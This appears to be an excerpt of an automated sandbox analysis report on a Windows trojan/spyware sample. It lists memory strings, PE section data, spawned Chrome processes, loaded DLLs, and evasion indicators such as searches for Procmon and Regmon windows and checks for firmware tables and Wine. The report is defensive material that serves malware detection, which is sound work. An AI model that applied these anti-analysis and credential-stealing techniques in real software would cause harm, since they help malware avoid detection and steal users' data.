          Source: file.exe, 00000000.00000003.2314381169.000000000590F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2318895876.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2318774244.0000000005A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2325105251.0000000005856000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2316769412.000000000593B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2354042080.0000000005652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2311358947.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2321841253.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2321652152.0000000005AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2316308288.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2325283284.000000000599D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2354115874.0000000005416000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2305216054.00000000054C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315161712.0000000005861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2325607188.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315774622.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2314615696.000000000585E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2354078059.0000000005459000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000002.2452230590.0000000005439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
          Source: file.exe, 00000000.00000003.2316427681.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2316653151.0000000005853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2323590329.000000000585F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2321278825.0000000005854000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2307318689.0000000005861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2306987213.00000000054B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2307441261.00000000058F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315469065.0000000005923000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2323453269.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315881283.0000000005922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2302663109.0000000005652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2305403766.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2319475648.0000000005961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2320098497.0000000005970000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2310600210.00000000059A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000002.2452720089.0000000005B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2319905087.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2305103945.00000000056DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2321432839.0000000005980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2318659518.000000000595F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2326077632.00000000059A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2317705380.0000000005950000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2321152146.0000000005975000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2314946287.0000000005919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2319275512.0000000005853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2314275939.0000000005853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2319151023.0000000005A6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2320833667.0000000005A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315571693.000000000585B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2305550957.00000000054B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2326426824.000000000585B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2316544360.0000000005940000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2317573424.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2314499343.00000000059C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2314846735.0000000005854000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992379610655737
          Source: file.exeStatic PE information: Section: bydimkjm ZLIB complexity 0.9948087228341769
          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/67@7/6
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000000.00000003.2124938635.000000000544E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101547043.00000000053BA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124938635.00000000053B5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101223606.00000000053D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeVirustotal: Detection: 41%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 --field-trial-handle=2332,i,7438478652651464284,9822841454251947196,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,12934382445748236653,13668332504761590760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 --field-trial-handle=2332,i,7438478652651464284,9822841454251947196,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,12934382445748236653,13668332504761590760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
          Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: file.exeStatic file information: File size 1891328 > 1048576
          Source: file.exeStatic PE information: Raw size of bydimkjm is bigger than: 0x100000 < 0x1a3e00
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2364593718.0000000007D10000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2453060574.0000000005DD2000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.8c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bydimkjm:EW;rvusllyz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bydimkjm:EW;rvusllyz:EW;.taggant:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: file.exeStatic PE information: real checksum: 0x1d8fa4 should be: 0x1cf666
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: bydimkjm
          Source: file.exeStatic PE information: section name: rvusllyz
          Source: file.exeStatic PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F1A27 push cs; iretd 0_3_007F1A2F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F1A27 push cs; iretd 0_3_007F1A2F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F1A27 push cs; iretd 0_3_007F1A2F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F1A27 push cs; iretd 0_3_007F1A2F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FC9 push esi; retn 007Dh0_3_007F4FCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007917E1 pushfd ; retf 0_3_00791882
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007917E1 pushfd ; retf 0_3_00791882
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007917E1 pushfd ; retf 0_3_00791882
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007917E1 pushfd ; retf 0_3_00791882
          Source: file.exeStatic PE information: section name: entropy: 7.9776660996071636
          Source: file.exeStatic PE information: section name: bydimkjm entropy: 7.95351090655131

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
